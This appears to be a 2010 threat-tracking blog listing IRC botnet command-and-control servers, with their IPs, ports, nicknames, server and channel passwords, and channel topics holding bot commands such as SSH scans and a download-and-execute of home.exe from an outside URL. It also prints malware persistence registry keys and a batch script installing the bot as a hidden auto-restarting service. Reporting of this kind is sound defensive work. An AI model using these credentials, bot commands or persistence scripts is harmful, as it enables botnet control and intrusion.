gangbang.mytijn.org DNS_TYPE_A 98.156.90.172 85.92.87.233
98.156.90.172:43000
Botnet C&C irc
Nick: |KOR|XP|00|803303|
Username: SP3-443
Server Pass: scary
Joined Channel: #!ssh with Password ERROR
Channel Topic for Channel #!ssh: ".aSc ssh 40 8 0 85.x.x.x -b -r -s |.aSc ssh 40 8 0 85.x.x.x -b -r -s |.aSc ssh 40 8 0 86.x.x.x -b -r -s"
Startup
Services Created:
Name Type Path
Windows System Updates SERVICE_AUTO_START "C:\Documents and Settings\Administrator\Application Data\exxploiter.exe"
Tuesday, July 6, 2010
gangbang.mytijn.org ( ssh2 )
Posted by Role at 7:23 PM 0 comments
Saturday, July 3, 2010
irc.metraiciono.com
irc.metraiciono.com DNS_TYPE_A 95.211.84.164
95.211.84.164:6567
Botnet C&C irc
Nick: [SI|AUT|00|P|04244]
Username: XP-5923
Server Pass: pr1v4d0onl1n3r
Joined Channel: #canal1# with Password c1rc0s0leil
Channel Topic for Channel #canal1#: ".desfi http://174.121.2.222/~toxicok/wp-content/languages/home.exe c:\WINDOWS\home.exe 1"
Private Message to Channel #canal1#: "[Dl]: File download: 128.0KB to: c:\WINDOWS\home.exe @ 64.0KB/sec."
Private Message to Channel #canal1#: "[Dl]: Created process: "c:\WINDOWS\home.exe", PID: <448>"
Startup
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Terminal Server\Install\Software\Microsoft\Windows\CurrentVersion\Run\
info Ci Servs Sontiwin.exe
HKLM\SOFTWARE\Microsoft\ Windows\CurrentVersion\Run\
info Ci Servs Sontiwin.exe
Posted by Role at 9:27 PM 0 comments
Friday, July 2, 2010
l33t.shadow-mods.net ( RadXScan )
l33t.shadow-mods.net:6667
91.121.78.121:6667
Botnet C&C irc
channel:##konvit-rad##
key:f00kU
Startup
rem ### SERVICE CONFIG FILE ###
SET CONFIG=Service.dll
IF EXIST %CONFIG% EXIT
ECHO>%CONFIG% [Settings]
ECHO>>%CONFIG% ServiceName=svcfost
ECHO>>%CONFIG% CheckProcessSeconds=60
ECHO.>>%CONFIG%
ECHO>>%CONFIG% [Process0]
ECHO>>%CONFIG% CommandLine=svchost.exe
ECHO>>%CONFIG% WorkingDir=%CD%\
ECHO>>%CONFIG% PauseStart=1000
ECHO>>%CONFIG% PauseEnd=1000
ECHO>>%CONFIG% UserInterface=No
ECHO>>%CONFIG% Restart=Yes
service -i
net start svcfost
Posted by Role at 7:22 PM 0 comments
irc.bigshitsandwich.org ( RadXScan )
irc.bigshitsandwich.org:6667
83.170.84.20:6667
Botnet C&C irc
Channel:#mp3-ops
key:fuckU
* Topic is '.scan 77'
* Set by doom on Sat Jul 03 07:58:54
startup
rem ### SERVICE CONFIG FILE ###
SET CONFIG=Service.dll
IF EXIST %CONFIG% EXIT
ECHO>%CONFIG% [Settings]
ECHO>>%CONFIG% ServiceName=svcfost
ECHO>>%CONFIG% CheckProcessSeconds=60
ECHO.>>%CONFIG%
ECHO>>%CONFIG% [Process0]
ECHO>>%CONFIG% CommandLine=Radx.exe
ECHO>>%CONFIG% WorkingDir=%CD%\
ECHO>>%CONFIG% PauseStart=1000
ECHO>>%CONFIG% PauseEnd=1000
ECHO>>%CONFIG% UserInterface=No
ECHO>>%CONFIG% Restart=Yes
service -i
net start svcfost
Posted by Role at 5:30 PM 0 comments
Thursday, July 1, 2010
gangbang.mytijn.org
gangbang.mytijn.org
DNS_TYPE_A
85.92.87.233
98.156.90.172
85.92.87.233:25343
Botnet C&C irc
Nick: :|XP|00|AUT|79994
Username: PotHead
Server Pass: scary
Joined Channel: #Main# with Password ERROR
Channel Topic for Channel #Main#: ".scan RUS 35 3 0 -b -s"
Startup
HKLM\SOFTWARE\Microsoft\Windows\ CurrentVersion\Run\
info cRSCS crscs.exe
Posted by Role at 5:47 AM 0 comments
Subscribe to:
Posts (Atom)
